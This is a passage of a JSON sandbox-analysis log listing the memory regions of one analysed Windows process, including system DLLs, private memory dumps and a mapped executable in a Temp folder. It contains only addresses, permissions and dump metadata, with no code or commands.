"executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_977", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.703", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000978-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_978", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:25.706", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000979-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_979", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:25.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_980", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:01:25.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 483328, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4677631, "entry_point": 4194304, "filename": "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe", "id": "region_981", "name": "mvmubw.exe", "norm_filename": "c:\\users\\adu0vk~1\\appdata\\local\\temp\\mvmubw.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:25.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_982", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:01:25.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2003959808, "type": "region", "version": 1 }, "end_va": 2005532671, "entry_point": 2003959808, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_983", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003959808, "timestamp": "00:01:25.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_984", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:25.791", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000985-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:25.792", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000986-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:25.792", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000987-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_987", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:25.792", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_988", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:25.793", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000989-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_989", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:25.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_990", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:25.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_991", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:25.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000992-addr_0x0000000000280000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_992", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:25.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1942224896, "type": "region", "version": 1 }, "end_va": 1942601727, "entry_point": 1942224896, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_993", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1942224896, "timestamp": "00:01:25.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1942618112, "type": "region", "version": 1 }, "end_va": 1942876159, "entry_point": 1942618112, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_994", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1942618112, "timestamp": "00:01:25.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1943076864, "type": "region", "version": 1 }, "end_va": 1943109631, "entry_point": 1943076864, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_995", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1943076864, "timestamp": "00:01:25.821", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000996-addr_0x0000000000550000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6619135, "entry_point": 0, "filename": null, "id": "region_996", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:01:25.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1977352192, "type": "region", "version": 1 }, "end_va": 1978466303, "entry_point": 1977352192, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_997", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1977352192, "timestamp": "00:01:25.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1998020607, "entry_point": 1997733888, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_998", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:26.032", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000999-addr_0x0000000077320000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 0, "filename": null, "id": "region_999", "name": "private_0x0000000077320000", "norm_filename": null, "region_type": "private_memory", "start_va": 1999765504, "timestamp": "00:01:26.081", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001000-addr_0x0000000077440000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 0, "filename": null, "id": "region_1000", "name": "private_0x0000000077440000", "norm_filename": null, "region_type": "private_memory", "start_va": 2000945152, "timestamp": "00:01:26.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1001", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:26.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 2191359, "entry_point": 1769472, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1002", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1769472, "timestamp": "00:01:26.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965539327, "entry_point": 1965490176, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1003", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:01:26.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1965555712, "type": "region", "version": 1 }, "end_va": 1965948927, "entry_point": 1965555712, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1004", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1965555712, "timestamp": "00:01:26.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1967390720, "type": "region", "version": 1 }, "end_va": 1968373759, "entry_point": 1967390720, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1005", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967390720, "timestamp": "00:01:26.137", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1971191808, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971191808, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1006", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1971191808, "timestamp": "00:01:26.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972830208, "type": "region", "version": 1 }, "end_va": 1972932607, "entry_point": 1972830208, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1007", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972830208, "timestamp": "00:01:26.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974140928, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1008", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:01:26.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1976631296, "type": "region", "version": 1 }, "end_va": 1977335807, "entry_point": 1976631296, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1009", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1976631296, "timestamp": "00:01:26.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1979580416, "type": "region", "version": 1 }, "end_va": 1992466431, "entry_point": 1979580416, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_1010", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1979580416, "timestamp": "00:01:26.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1995505664, "type": "region", "version": 1 }, "end_va": 1995862015, "entry_point": 1995505664, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1011", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1995505664, "timestamp": "00:01:27.036", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1996398591, "entry_point": 1996357632, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1012", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:01:27.102", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1998061568, "type": "region", "version": 1 }, "end_va": 1998704639, "entry_point": 1998061568, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1013", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1998061568, "timestamp": "00:01:27.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1999110144, "type": "region", "version": 1 }, "end_va": 1999765503, "entry_point": 1999110144, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1014", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1999110144, "timestamp": "00:01:27.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1015", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:27.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1016", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:27.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 8224767, "entry_point": 0, "filename": null, "id": "region_1017", "name": "pagefile_0x0000000000650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6619136, "timestamp": "00:01:27.204", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001018-addr_0x0000000000800000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8388608, "type": "region", "version": 1 }, "end_va": 8454143, "entry_point": 0, "filename": null, "id": "region_1018", "name": "private_0x0000000000800000", "norm_filename": null, "region_type": "private_memory", "start_va": 8388608, "timestamp": "00:01:27.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1975255040, "type": "region", "version": 1 }, "end_va": 1976090623, "entry_point": 1975255040, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1019", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1975255040, "timestamp": "00:01:27.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1995964416, "type": "region", "version": 1 }, "end_va": 1996357631, "entry_point": 1995964416, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1020", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1995964416, "timestamp": "00:01:27.215", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001021-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1021", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:27.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001022-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1022", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:27.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8454144, "type": "region", "version": 1 }, "end_va": 10031103, "entry_point": 0, "filename": null, "id": "region_1023", "name": "pagefile_0x0000000000810000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8454144, "timestamp": "00:01:27.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 31064063, "entry_point": 0, "filename": null, "id": "region_1024", "name": "pagefile_0x00000000009a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10092544, "timestamp": "00:01:27.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1940389888, "type": "region", "version": 1 }, "end_va": 1940914175, "entry_point": 1940389888, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1025", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1940389888, "timestamp": "00:01:27.243", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001026-addr_0x0000000000300000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1026", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:27.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31064064, "type": "region", "version": 1 }, "end_va": 31977471, "entry_point": 0, "filename": null, "id": "region_1027", "name": "pagefile_0x0000000001da0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31064064, "timestamp": "00:01:27.268", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1935671296, "type": "region", "version": 1 }, "end_va": 1935749119, "entry_point": 1935671296, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_1028", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1935671296, "timestamp": "00:01:27.289", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001029-addr_0x0000000000370000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1029", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:27.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 34926591, "entry_point": 31981568, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1030", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31981568, "timestamp": "00:01:27.446", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001031-addr_0x0000000000220000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_1031", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:01:27.457", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001032-addr_0x0000000002150000-size_0x000000000012f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1241088, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 36171775, "entry_point": 0, "filename": null, "id": "region_1032", "name": "private_0x0000000002150000", "norm_filename": null, "region_type": "private_memory", "start_va": 34930688, "timestamp": "00:01:27.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001033-addr_0x0000000000400000-size_0x0000000000042000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], 